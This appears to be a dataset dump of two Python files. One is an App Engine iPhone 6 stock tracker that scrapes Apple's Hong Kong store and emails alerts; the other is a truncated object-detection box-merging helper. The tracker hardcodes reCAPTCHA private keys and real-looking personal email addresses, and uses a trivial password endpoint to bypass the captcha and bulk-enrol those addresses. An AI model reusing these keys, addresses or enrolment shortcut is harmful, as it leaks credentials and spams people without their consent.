text
stringlengths 8
6.05M
|
|---|
# Web Server Gateway Interface (WSGI)
from google.appengine.api import users
import webapp2
import json
import logging
from datetime import datetime
import time
import datetime
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
from urllib import urlencode
import re
from urllib2 import unquote
from google.appengine.api import mail
USER_AGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/437.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/437.78.2"
REFERRER_HK_ONLINE = "http://store.apple.com/hk/buy-iphone/iphone6"
REFERRER_HK_LOCAL = "https://reserve.cdn-apple.com/HK/en_HK/reserve/iPhone"
ONLINE_TAG = "Online"
PUBLIC_KEY_HKGOLDEN = "6LewtPoSAAAAAMTE4LeAjBa3JB7jUQRB_X422sIw"
PRIVATE_KEY_HKGOLDEN = "6LewtPoSAAAAAHTgjxbVMSjDk1XxKU4ut_DfWzH3"
PUBLIC_KEY_HKG = "6LedovoSAAAAAKFD_syd1EgMJrwGLC_GqOW8h7XV"
PRIVATE_KEY_HKG = "6LedovoSAAAAAHoFEfNTri-6L_NdPjbJC7zLgq2R"
PUBLIC_KEY_707 = "6LfTovoSAAAAAPAruvpcbAxuJgZ5SVYP9NW1mtgD"
PRIVATE_KEY_707 = "6LfTovoSAAAAAGhU4DkvAe-vNKHgA63RnZ9yhn0o"
# PUBLIC_KEY = PUBLIC_KEY_HKGOLDEN
# PRIVATE_KEY = PRIVATE_KEY_HKGOLDEN
# PUBLIC_KEY = PUBLIC_KEY_HKG
# PRIVATE_KEY = PRIVATE_KEY_HKG
PUBLIC_KEY = PUBLIC_KEY_707
PRIVATE_KEY = PRIVATE_KEY_707
#STORE_JSON_HK = "https://reserve.cdn-apple.com/HK/en_HK/reserve/iPhone/stores.json"
AVAILABILITY_JSON_HK = "https://reserve.cdn-apple.com/HK/en_HK/reserve/iPhone/availability.json"
STORE_JSON_HK = "https://www.dropbox.com/s/3x227l09qo49gwp/stores_hk.json?dl=1"
#AVAILABILITY_JSON_HK = "https://www.dropbox.com/s/1hg8gfc7awrmlbi/AVAILABILITY_HK.json?dl=1"
#STORE_JSON_FR = https://reserve.cdn-apple.com/FR/fr/reserve/iPhone/stores.json
#AVAILABILITY_JSON_FR = "https://reserve.cdn-apple.com/FR/fr/reserve/iPhone/availability.json"
# STORE_JSON_FR = "https://www.dropbox.com/s/e057xohvb15dwve/stores_fr.json?dl=1"
# AVAILABILITY_JSON_FR = "https://www.dropbox.com/s/zzs8xq3g4ilg0rh/availability_fr.json?dl=1"
URLs_HK = ["http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=4_7inch&option.dimensionColor=silver&option.dimensionCapacity=16gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=4_7inch&option.dimensionColor=silver&option.dimensionCapacity=64gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=4_7inch&option.dimensionColor=silver&option.dimensionCapacity=128gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=4_7inch&option.dimensionColor=gold&option.dimensionCapacity=16gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=4_7inch&option.dimensionColor=gold&option.dimensionCapacity=64gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=4_7inch&option.dimensionColor=gold&option.dimensionCapacity=128gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=4_7inch&option.dimensionColor=space_gray&option.dimensionCapacity=16gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=4_7inch&option.dimensionColor=space_gray&option.dimensionCapacity=64gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=4_7inch&option.dimensionColor=space_gray&option.dimensionCapacity=128gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6P?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=5_5inch&option.dimensionColor=silver&option.dimensionCapacity=16gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6P?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=5_5inch&option.dimensionColor=silver&option.dimensionCapacity=64gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6P?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=5_5inch&option.dimensionColor=silver&option.dimensionCapacity=128gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6P?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=5_5inch&option.dimensionColor=gold&option.dimensionCapacity=16gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6P?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=5_5inch&option.dimensionColor=gold&option.dimensionCapacity=64gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6P?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=5_5inch&option.dimensionColor=gold&option.dimensionCapacity=128gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6P?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=5_5inch&option.dimensionColor=space_gray&option.dimensionCapacity=16gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6P?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=5_5inch&option.dimensionColor=space_gray&option.dimensionCapacity=64gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED",
"http://store.apple.com/hk/buyFlowSelectionSummary/IPHONE6P?node=home/shop_iphone/family/iphone6&step=select&option.dimensionScreensize=5_5inch&option.dimensionColor=space_gray&option.dimensionCapacity=128gb&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED"]
URL_APPLE_STORE = "http://store.apple.com/"
URL_REGION = "hk"
URL_IPHONE6R = "/buyFlowSelectionSummary/IPHONE6?node=home/shop_iphone/family/iphone6&step=select"
URL_IPHONE6P = "/buyFlowSelectionSummary/IPHONE6P?node=home/shop_iphone/family/iphone6&step=select"
URL_SIZE_47 = "&option.dimensionScreensize=4_7inch"
URL_SIZE_55 = "&option.dimensionScreensize=5_5inch"
URL_COLOR_SILVER = "&option.dimensionColor=silver"
URL_COLOR_GOLD = "&option.dimensionColor=gold"
URL_COLOR_SPACE = "&option.dimensionColor=space_gray"
URL_16GB = "&option.dimensionCapacity=16gb"
URL_64GB = "&option.dimensionCapacity=64gb"
URL_128GB = "&option.dimensionCapacity=128gb"
URL_UNLOCKED = "&option.carrierModel=UNLOCKED%2FWW&carrierPolicyType=UNLOCKED"
#16 64 128
MAPs = ["MG482ZP/A","MG4H2ZP/A","MG4C2ZP/A", # 4.7 Silver
"MG492ZP/A","MG4J2ZP/A","MG4E2ZP/A", # 4.7 Gold
"MG472ZP/A","MG4F2ZP/A","MG4A2ZP/A", # 4.7 Space Grey
"MGA92ZP/A","MGAJ2ZP/A","MGAE2ZP/A", # 5.5 Silver
"MGAA2ZP/A","MGAK2ZP/A","MGAF2ZP/A", # 5.5 Gold
"MGA82ZP/A","MGAH2ZP/A","MGAC2ZP/A"] # 5.5 Space Grey
model_map = {}
model_map['MG482ZP/A'] = "Silver 16GB 4.7"
model_map['MG4H2ZP/A'] = "Silver 64GB 4.7"
model_map['MG4C2ZP/A'] = "Silver 128GB 4.7"
model_map['MG492ZP/A'] = "Gold 16GB 4.7"
model_map['MG4J2ZP/A'] = "Gold 64GB 4.7"
model_map['MG4E2ZP/A'] = "Gold 128GB 4.7"
model_map['MG472ZP/A'] = "Space Grey 16GB 4.7"
model_map['MG4F2ZP/A'] = "Space Grey 64GB 4.7"
model_map['MG4A2ZP/A'] = "Space Grey 128GB 4.7"
model_map['MGA92ZP/A'] = "Silver 16GB 5.5"
model_map['MGAJ2ZP/A'] = "Silver 64GB 5.5"
model_map['MGAE2ZP/A'] = "Silver 128GB 5.5"
model_map['MGAA2ZP/A'] = "Gold 16GB 5.5"
model_map['MGAK2ZP/A'] = "Gold 64GB 5.5"
model_map['MGAF2ZP/A'] = "Gold 128GB 5.5"
model_map['MGA82ZP/A'] = "Space Grey 16GB 5.5"
model_map['MGAH2ZP/A'] = "Space Grey 64GB 5.5"
model_map['MGAC2ZP/A'] = "Space Grey 128GB 5.5"
loc_map = {}
loc_map['R409'] = "Causeway Bay iReserve"
loc_map['R428'] = "IFC Mall iReserve"
loc_map['R485'] = "Festival Walk iReserve"
loc_map['Online'] = "store.apple.com/hk"
class MailingList(ndb.Model):
email = ndb.StringProperty()
dateTimeCreated = ndb.DateTimeProperty(auto_now_add=True)
active = ndb.BooleanProperty() # 1 active 0 inactive
lastSent = ndb.DateTimeProperty(auto_now=True)
def getAll(self):
return self.query().fetch()
def getLastSent(self):
obj = ndb.Key(MailingList, "3dmouse@gmail.com").get()
return obj.lastSent
def writeLastSent(self):
obj = ndb.Key(MailingList, "3dmouse@gmail.com").get()
obj.put()
def store(self, _email):
if self.isExisting(_email):
return False
obj = MailingList(key=ndb.Key(MailingList, _email),
email=_email,
active=True)
obj.put()
return True
def isExisting(self,_email):
obj = ndb.Key(MailingList, _email).get()
if obj is None:
return False
if obj.active is False:
return False
return True
def inactive(self,_email, _key):
obj = ndb.Key(MailingList, _email).get()
if obj.dateTimeCreated == _key:
obj.active = False
obj.put()
return True
else:
return False
def issue(self):
return self.dateTimeCreated
# Product (key = partNumber)
class Product(ndb.Model):
partNumber = ndb.StringProperty()
productName = ndb.StringProperty() # iPhone 6 Plus
capacity = ndb.IntegerProperty()
size = ndb.FloatProperty()
color = ndb.StringProperty()
unlocked = ndb.BooleanProperty() # 1 Unlocked, 0 locked
country = ndb.StringProperty()
def get(self):
return self.query().fetch()
def peek(self,_partNumber):
return ndb.Key(Product, _partNumber).get()
def store(self, _partNumber, _productName, _capacity, _color, _unlocked, _country):
if _productName.find("Plus") > 0:
_size = 5.5
else:
_size = 4.7
obj = Product(key=ndb.Key(Product,_partNumber),
partNumber=_partNumber,
productName=_productName,
capacity=int(_capacity),
size=_size,
color=_color,
unlocked=_unlocked,
country=_country)
obj.put()
# Location (key = storeId)
class Location(ndb.Model):
storeId = ndb.StringProperty()
storeName = ndb.StringProperty()
isOpen = ndb.BooleanProperty()
lastOpenDateTime = ndb.DateTimeProperty(auto_now=True)
def get(self, _storeId):
return self.query(Location.storeId == _storeId).get()
def updateOpen(self, _storeId):
obj = self.get(_storeId)
obj.isOpen = True
obj.put()
def save(self, _storeId, _storeName):
obj = Location(key=ndb.Key(Location, _storeId))
obj.storeId = _storeId
obj.storeName = _storeName
obj.put()
# Product: iPhone6 Silver 16GB
# location:
# availability: "0" (Not Available) : "1" (Available) : "2" (Error)
# dateTimeUpdated: provided by Apple (may not be available)
# dateTimeCreated: Date and Time at
class Available(ndb.Model):
partNumber = ndb.StringProperty()
storeId = ndb.StringProperty()
availability = ndb.IntegerProperty()
dateTimeCreated = ndb.DateTimeProperty(auto_now_add=True)
def get_latest_availability(self,_partNumber, _storeId):
obj = Available()
ret = obj.query(Available.partNumber == _partNumber, Available.storeId == _storeId).order(-Available.dateTimeCreated).get()
if ret is None:
return [3, None, ret]
else:
return [ret.availability, ret.dateTimeCreated, ret]
def get(self, _storeId):
return self.query(storeId=_storeId).order('-dateTimeCreated').fetch()
def getLast(self, _storeId):
return self.query(storeId=_storeId).order('-dateTimeCreated').get()
def save(self, _partNumber, _storeId, _availability):
obj = Available(partNumber=_partNumber,
storeId=_storeId,
availability=_availability)
obj.put()
class CrawlingHandler(webapp2.RequestHandler):
lastSent = None
flag = False
email_content = ""
def online_store(self):
for i in range(len(URLs_HK)):
_url = URLs_HK[i]
result = urlfetch.fetch(_url, headers = {'Referer': REFERRER_HK_ONLINE,'User-Agent': USER_AGENT })
# print "header "+str(result.headers)
# print "header msg "+str(result.header_msg)
# print "final_url "+str(result.final_url)
# print "status code "+str(result.status_code)
# print result.
if result.status_code == 200:
content = json.loads(result.content)
response_status = content["head"]["status"] # 200 Apple OK
logging.info("Fetching ... "+_url)
try:
pageTitle = content["body"]["content"]["pageTitle"].decode('utf-8')
### Country
_country = pageTitle[pageTitle.rfind('(')+1:pageTitle.rfind(')')]
### Model Number
_partNumber = content["body"]["content"]["selected"]["partNumber"].decode('utf-8')
productTitle = content["body"]["content"]["selected"]["productTitle"].decode('utf-8').upper()
shippingLead = content["body"]["content"]["selected"]["purchaseOptions"]["shippingLead"].decode('utf-8')
except ValueError:
logging.error("Receive empty json. "+_url)
continue
except KeyError:
logging.error("Receive empty json. "+_url)
continue
availability = shippingLead.find("Currently unavailable")
### iPhone6 or iPhone
iphoneType = productTitle.find("PLUS") # -1 is a iPhone6, otherwise iPhone6 Plus
if iphoneType < 0:
_productName = "iPhone 6"
else:
_productName = "iPhone 6 Plus"
### Capacity
gbList = ["16","64","128"]
gbIndex = ""
offset = 2
for gb in gbList:
gbIndex = productTitle.find(gb)
offset = 3 if gb == "128" else 2
if gbIndex > 0:
break
_capacity = productTitle[gbIndex:gbIndex+offset].strip()
### Color
space_grey = productTitle.find("GREY")
silver = productTitle.find("SILVER")
gold = productTitle.find("GOLD")
if space_grey > 0:
_color = "Space Grey"
elif silver > 0:
_color = "Silver"
elif gold > 0:
_color = "Gold"
else:
_color = "Unknown Color"
### Policy
unlocked = productTitle.find("UNLOCKED")
_unlocked = True if unlocked > 0 else False
if response_status == "200":
_availability = 0 if availability > 0 else 1
else:
_availability = 2 # error from apple store
# Do a search in case of new record in product like new part number
availabilityObject = Available()
# check the latest status if it has NOT been changed, then do not update.
latest_availability = availabilityObject.get_latest_availability(_partNumber, ONLINE_TAG)
if latest_availability[1] is None:
#logging.critical("online store Part Number: "+str(_partNumber) )
productObject = Product()
productObject.store(_partNumber,_productName, _capacity, _color, _unlocked, _country)
availabilityObject.save(_partNumber, ONLINE_TAG, _availability)
else:
if latest_availability[0] != _availability:
availabilityObject.save(_partNumber, ONLINE_TAG, _availability)
if _availability == 1:
self.email_content += "[Online] :"+str(_partNumber)+" now available. \n"
self.flag = True
# self.response.headers['Content-type'] = 'application/json'
# response = {'status': 'OK',
# 'productTitle': productTitle,
# 'partNumber': _partNumber,
# 'availability': _availability
# }
# response = json.dumps(response)
logging.info('Online Store successfully fetched data')
else:
logging.error('Online Store is not working with status code '+result.status_code)
# self.response.headers['Content-type'] = 'application/json'
# response = {'status': 'Error'}
# response = json.dumps(response)
# self.response.write(response)
def local_store(self):
result = urlfetch.fetch(AVAILABILITY_JSON_HK, headers = {'Referer': REFERRER_HK_LOCAL,'User-Agent': USER_AGENT })
if result.status_code == 200:
content = json.loads(result.content)
logging.info("local Store is reading ...."+result.content)
#if iReserve Closes
# Check if the store is closed within the minute, then update all items become unavailable.
# Sign1: the content dictionary is empty. = store Closed
# Sign2: Grab one of the item's last creation to see
if len(content) == 0:
location_object = Location()
lastSeen = location_object.get("R409").lastOpenDateTime
if lastSeen is not None and (datetime.datetime.now() - lastSeen).seconds < 300:
QuickFixHandler().get()
else:
#if iReserve Opens
for _storeId in content:
#self.emailDistribute()
#logging.critical("iReserve Opens")
if _storeId != "updated":
for _partNumber in content[_storeId]:
_availability = 1 if content[_storeId][_partNumber] else 0
#productObject = Product()
#partNumber = productObject.peek(_partNumber)
#if partNumber is not None: # not a new product
availabilityObject = Available()
latest_availability = availabilityObject.get_latest_availability(_partNumber, _storeId)
##########
#self.email_content += "[ON] "+str(model_map[_partNumber])+": at "+str(loc_map[_storeId])+" \n"
#self.flag = True
##########
if latest_availability[1] is None:
logging.critical("local new product "+str(_partNumber)+" at "+str(_storeId))
else:
if latest_availability[0] != _availability:
availabilityObject.save(_partNumber, _storeId , _availability) # update available
if _availability == 1:
#logging.critical("[ON] "+str(model_map[_partNumber])+": at "+str(loc_map[_storeId]))
self.email_content += "[ON] "+str(model_map[_partNumber])+": at "+str(loc_map[_storeId])+" \n"
self.flag = True
logging.info("Successfully fetched - "+model_map[_partNumber]+" in local store at "+loc_map[_storeId])
else:
logging.error("Local Store Apple Server return an error "+result.status_code)
def emailDistribute(self, _string):
lastSentTime = None
if self.lastSent is None:
pass
#logging.critical("lastSent is None")
#logging.critical(datetime.datetime.now())
if MailingList().getLastSent() is None:
pass
#logging.critical("Mailing List getLastSent is None")
else:
lastSentTime = MailingList().getLastSent()
#logging.critical("Mailing List getLastSent is not None 4000 or 900 at version 012451")
#logging.critical(str((datetime.datetime.now() - lastSentTime).seconds))
lastSentDelta = (datetime.datetime.now() - lastSentTime).seconds
if self.lastSent is None and (lastSentTime is None or lastSentDelta > 300 ):
obj = MailingList()
all = obj.getAll()
for customer in all:
_email = customer.email
sender_address = "iPhone6 開賣 Alert <naivedevelopers@gmail.com>"
subject = "[有貨] iPhone6 開賣 Alert 有Update."
body = """
直入Login: https://reserve-hk.apple.com/HK/zh_HK/reserve/iPhone
Check邊度有貨: https://reserve.cdn-apple.com/HK/en_HK/reserve/iPhone/availability
"""
body += _string
logging.critical("["+str(datetime.datetime.now())+"]email writing to "+str(_email))
mail.send_mail(sender_address,_email, subject, body)
obj.writeLastSent()
else:
self.lastSent = "THINGS"
def get(self):
logging.info('CrawlingHandler: Starting Fetch data')
self.online_store()
self.local_store()
if self.flag is True:
self.emailDistribute(self.email_content)
class DisplayStatusHandler (webapp2.RequestHandler):
def getJson(self):
product_object = Product()
result_product = product_object.query().fetch()
dict_json_1 = {}
for product in result_product:
_partNumber = product.partNumber
location_object = Location()
result_location = location_object.query().fetch()
_available_object = Available()
_availability = _available_object.get_latest_availability(_partNumber,ONLINE_TAG)
dict_json_2 = {}
dict_json_2[ONLINE_TAG] = [_availability[0], _availability[1]]
for location in result_location:
_storeId = location.storeId
_storeName = location.storeName
_available_object = Available()
_availability = _available_object.get_latest_availability(_partNumber,_storeId)
dict_json_2[_storeId] = [_availability[0], _availability[1]]
dict_json_1[_partNumber] = dict_json_2
return dict_json_1
def interpret(self,_available, _datetime):
if _datetime is None:
return "Unavailable"
if _available == 0 or _available == 3:
return "Unavailable ("+ u'最近一次開售'.encode('utf8') +str(datetime.timedelta(hours=+8) + _datetime)+")"
return unquote(u"有得買 NOW".encode("latin1")).decode("utf8")
def interpretAvailable(self,_available):
if _available == 0 or _available == 3:
return "Unavailable "
return "Available NOW "
def interpretDateTime(self,_datetime):
if _datetime is None:
return "Unavailable"
return "( Last Release : "+str(datetime.timedelta(hours=+8) + _datetime)+")"
def get(self):
json = self.getJson()
ret = "<table>"
for partNumber in json:
head = "<tr> <th id=\""+str(partNumber)+"\">"+model_map[partNumber]+"</th>"
for loc in json[partNumber]:
ret += head
ret += "<th class=\""+str(partNumber)+str(loc)+"\">"+loc_map[loc]+"</th>"
ret += "<th>"+self.interpretAvailable(json[partNumber][loc][0])+"</th>"
ret += "<th>"+self.interpretDateTime(json[partNumber][loc][1])+"</th></tr>"
ret += "</table>"
self.response.headers['Content-type'] = 'text/html'
self.response.write("<!DOCTYPE html><html>" \
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\
<head><title> iPhone 6 Apple.com Status </title><body>"+ret +"</body></html>")
class GetStatusHandler(webapp2.RequestHandler):
def get(self): # Loop through Product and get its key
product_object = Product()
result_product = product_object.query().fetch()
dict_json_1 = {}
for product in result_product:
_partNumber = product.partNumber
location_object = Location()
result_location = location_object.query().fetch()
_available_object = Available()
_availability = _available_object.get_latest_availability(_partNumber,ONLINE_TAG)
dict_json_2 = {}
dict_json_2['"'+ONLINE_TAG+'"'] = str(_availability)
for location in result_location:
_storeId = location.storeId
_storeName = location.storeName
_available_object = Available()
_availability = _available_object.get_latest_availability(_partNumber,_storeId)
dict_json_2['"'+_storeId+'"'] = str(_availability)
dict_json_1['"'+_partNumber+'"'] = dict_json_2
ret_json = json.dumps(dict_json_1)
self.response.headers['Content-type'] = 'application/json'
self.response.write(ret_json)
class LandingHandler(webapp2.RequestHandler):
def paragraph(self,_str):
return "<p>"+_str+"</p>"
def get(self): # Get Request
self.response.headers['Content-type'] = 'text/html'
self.response.write("<!DOCTYPE html><html>" \
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\
<head><title> iPhone 6 Apple.com Tracker </title><body> \
<h1>登記 iPhone6 喺 Apple Store開售 同 iReserve預約 嘅 Mailing List </h1>\
<p> <a href=\"http://iphone6-hkg.appspot.com/stat\">iphone6-hkg.appspot.com/stat</a>: 0759 - 0847 every 1 minute<br> \
<p> <a href=\"http://iphone6-707.appspot.com/stat\">iphone6-707.appspot.com/stat</a>: 0847 - 2000 every 1 minute<br>\
<p> <a href=\"http://iphone6-hkgolden.appspot.com/stat\">iphone6-hkgolden.appspot.com/stat</a> 2001 - 0758 every 2 minutes </p> \
<form method=\"POST\" action=\"/getEmail\"><input type=\"email\" name=\"email\" id=\"email\"\
placeholder=\"Email Address\" />\
<input type=\"submit\" value=\"Sign Up\" /> \
<script type=\"text/javascript\" \
src=\"http://www.google.com/recaptcha/api/challenge?k="+PUBLIC_KEY+"\"> \
</script><noscript> \
<iframe src=\"http://www.google.com/recaptcha/api/noscript?k="+PUBLIC_KEY+"\" \
height=\"300\" width=\"500\" frameborder=\"0\"></iframe><br> \
<textarea name=\"recaptcha_challenge_field\" rows=\"3\" cols=\"40\"></textarea> \
<input type=\"hidden\" name=\"recaptcha_response_field\" value=\"manual_challenge\"> </noscript></form> \
<p> Created By 高登高仔 @ HKGolden.com </p>\
</body></html>")
#<iframe src=\"/display\" style=\"border: 0; position: absolute; left:0; right:0; width:100%; height:100%\"\">
class StorePushHandler(webapp2.RequestHandler):
def get(self):
logging.info('Fetch data from STORE_JSON_HK')
result = urlfetch.fetch(STORE_JSON_HK)
content = json.loads(result.content)
stores = content["stores"]
for s in stores:
obj = Location()
obj.save(s["storeNumber"], s["storeName"])
class SuccessRegistrationHandler(webapp2.RequestHandler):
def get(self):
self.response.write("<html><meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\
<body><h1>搞掂咗。你會收到一封Email架。<p> You will receive a confirmation email containing \
information how to unsubscribe</p></body></html>")
class FailedRegistrationHandler(webapp2.RequestHandler):
def get(self):
self.response.write("<html><head><meta http-equiv=\"refresh\" content=\"3;url=/\" /> \
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" /></head><body>\
<h1> 可能一) 錯Captcha呀。你係小學雞。啲字母都搞唔清。再嚟過啦。 </h1> \
<h1> 可能二) 你咪入過囉. 做乜搞多次. </h1> \
<p>Redirecting in 3 seconds... or <a href=\"/\" >Click here to the landing page. \
</a></p></body></html>")
class ObtainEmailHandler(webapp2.RequestHandler):
def validate(self, _email):
return re.match(r'[^@]+@[^@]+\.[^@]+', _email)
def get(self):
password = self.request.get("password")
if password == "dying":
list = ["beauty235@gmail.com","bennylai@cen-1.com","cheukhinli@yahoo.com.hk","danielckn89@gmail.com",
"jonathanyth@gmail.com","michaelwong1231@gmail.com","oscarlai2383@gmail.com","s6f318484@hotmail.com",
"sailokto@yahoo.com.hk",
"wuwuyan1214@yahoo.com.hk",
"U3503819@GMAIL.COM",
"awdhoward@gmail.com",
"jonathanyth@gmail.com",
"laihiube@gmail.com",
"sailokto@yahoo.com.hk",
"wuwuyan1214@yahoo.com.hk",
"andrew030608@yahoo.com.hk",
"chanhok@live.hk",
"jonathanyth@gmail.com",
"kc343000@gmail.com",
"lcklrt1004@gmail.com",
"ryantck@gmail.com",
"sailokto@yahoo.com.hk",
"wuwuyan1214@yahoo.com.hk"]
obj = MailingList()
for _email in list:
if mail.is_email_valid(_email):
if obj.store(_email) is True:
sender_address = "iPhone6 開賣 Alert <naivedevelopers@gmail.com>"
subject = "多謝登記 iPhone6 開賣 Alert 服務"
body = """
最終入口: http://iphone6-hkgolden.appspot.com/
Backup1: http://iphone6-hkg.appspot.com/
Backup2: http://iphone6-707.appspot.com/
直入Login: https://reserve-hk.apple.com/HK/zh_HK/reserve/iPhone
Check邊度有貨: https://reserve.cdn-apple.com/HK/en_HK/reserve/iPhone/availability
"""
mail.send_mail(sender_address,_email, subject, body)
logging.info("Welcome letter sent to "+_email)
self.redirect("/success")
else:
self.redirect("/failure#1")
def post(self):
VERIFY_URL = "http://www.google.com/recaptcha/api/verify"
recaptcha_challenge_field = self.request.get("recaptcha_challenge_field")
recaptcha_response_field = self.request.get("recaptcha_response_field")
remoteIp = self.request.remote_addr
data = {
"privatekey": PRIVATE_KEY,
"remoteip": remoteIp,
"challenge": recaptcha_challenge_field,
"response": recaptcha_response_field}
response = urlfetch.fetch(url=VERIFY_URL,
payload=urlencode(data),
method="POST")
captcha_ok = True if response.content.split("\n")[0] == "true" else False
# logging.error("First line: %s " % response.content.split("\n")[0])
# logging.error("Valid: %s" % captcha_ok)
if captcha_ok:
_email = self.request.get("email")
obj = MailingList()
if mail.is_email_valid(_email):
if obj.store(_email) is True:
sender_address = "iPhone6 開賣 Alert <naivedevelopers@gmail.com>"
subject = "多謝登記 iPhone6 開賣 Alert 服務"
body = """
最終入口: http://iphone6-hkgolden.appspot.com/
Backup1: http://iphone6-hkg.appspot.com/
Backup2: http://iphone6-707.appspot.com/
直入Login: https://reserve-hk.apple.com/HK/zh_HK/reserve/iPhone
Check邊度有貨: https://reserve.cdn-apple.com/HK/en_HK/reserve/iPhone/availability
"""
mail.send_mail(sender_address,_email, subject, body)
self.redirect("/success")
else:
self.redirect("/failure#3")
else:
self.redirect("/failure#2")
else:
self.redirect("/failure#1")
# Mutate the availability value from 1 to 0
class QuickFixHandler(webapp2.RequestHandler):
def get(self):
obj = Product()
products = obj.get()
for each in products:
_partNumber = each.partNumber
available_obj = Available()
for _storeId in loc_map:
ret_list = available_obj.get_latest_availability(_partNumber, _storeId)
if ret_list[0] != 0:
ret_list[2].availability = 0
ret_list[2].put()
getEmailApp = webapp2.WSGIApplication([
('/getEmail', ObtainEmailHandler)
], debug=True)
landingApp = webapp2.WSGIApplication([
('/', LandingHandler)
], debug=True)
# getStatusApp = webapp2.WSGIApplication([
# ('/status', GetStatusHandler)
# ], debug=True)
pushStoreApp = webapp2.WSGIApplication([
('/push', StorePushHandler)
], debug=True)
crawlApp = webapp2.WSGIApplication([
('/crawl', CrawlingHandler)
], debug=True)
successRegistrationApp = webapp2.WSGIApplication([
('/success', SuccessRegistrationHandler)
], debug=True)
failedRegistrationApp = webapp2.WSGIApplication([
('/failure', FailedRegistrationHandler)
], debug=True)
displayStatusApp = webapp2.WSGIApplication([
('/stat', DisplayStatusHandler)
], debug=True)
quickFixApp = webapp2.WSGIApplication([
('/fix', QuickFixHandler)
], debug=True)
|
import os
import glob
import numpy as np
import argparse
import pandas as pd
from tqdm import tqdm
from ensemble_boxes import *
def string_to_row(df, fold_num):
csv = df.copy()
data = {'image_id':[], 'model':None, 'class':[], 'confidence':[],
'x_min':[], 'y_min':[], 'x_max':[], 'y_max': []}
img_id = class_ = confidence = x_min = y_mix = x_max = y_max = []
for idx, row in tqdm(csv.iterrows(), total=len(csv)):
pred = row['PredictionString'].split(' ')
for ptr in range(0, len(pred)-5, 6):
data['image_id'].append(row['image_id'])
data['class'].append(int(pred[ptr]))
data['confidence'].append(float(pred[ptr+1]))
data['x_min'].append(int(pred[ptr+2]))
data['y_min'].append(int(pred[ptr+3]))
data['x_max'].append(int(pred[ptr+4]))
data['y_max'].append(int(pred[ptr+5]))
data['model'] = fold_num
new_df = pd.DataFrame(data, columns=[key for key in data.keys()])
return new_df
def row_to_string(df):
data = {'image_id':[], 'PredictionString':[]}
current = df.iloc[0]['image_id']
string = ""
for idx, row in tqdm(df.iterrows(), total=len(df)):
if row.image_id == current:
string += f"{row['class']} {row.confidence} {row.x_min} {row.y_min} {row.x_max} {row.y_max} "
else:
data['image_id'].append(current)
data['PredictionString'].append(string)
#reset
string = f"{row['class']} {row.confidence:.2f} {row.x_min} {row.y_min} {row.x_max} {row.y_max} "
current = row.image_id
#add last id
data['image_id'].append(current)
data['PredictionString'].append(string)
new_df = pd.DataFrame(data, columns=[key for key in data.keys()])
return new_df
# Weighted Box Fusion
